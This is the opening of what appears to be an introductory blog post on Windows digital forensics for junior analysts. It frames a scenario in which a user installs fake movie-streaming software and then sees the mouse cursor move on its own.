You have just taken up a role as a Junior Digital Forensic Analyst. You have been informed that your regular duties would involve searching for evidence on Windows machines suspected of being compromised. If you knew what evidence to collect, when to collect it and how to collect it, then you would be in a great position to help your team with the investigation. This blog post will provide a high-level overview of the various sources of evidence on a Windows machine and how they may prove useful during an investigation.
Let’s consider a scenario. The new Batman movie has just come out. You are unable to watch it in the theatres, so you head over to a website that says, “Download this software, you can watch the new Batman movie immediately!”. You download the software, only to find out it is fake. Disappointed, you carry on with your work. Soon after, you begin to notice that the mouse cursor moves across the screen, on its own, without you actually using the mouse. This is not expected behavior.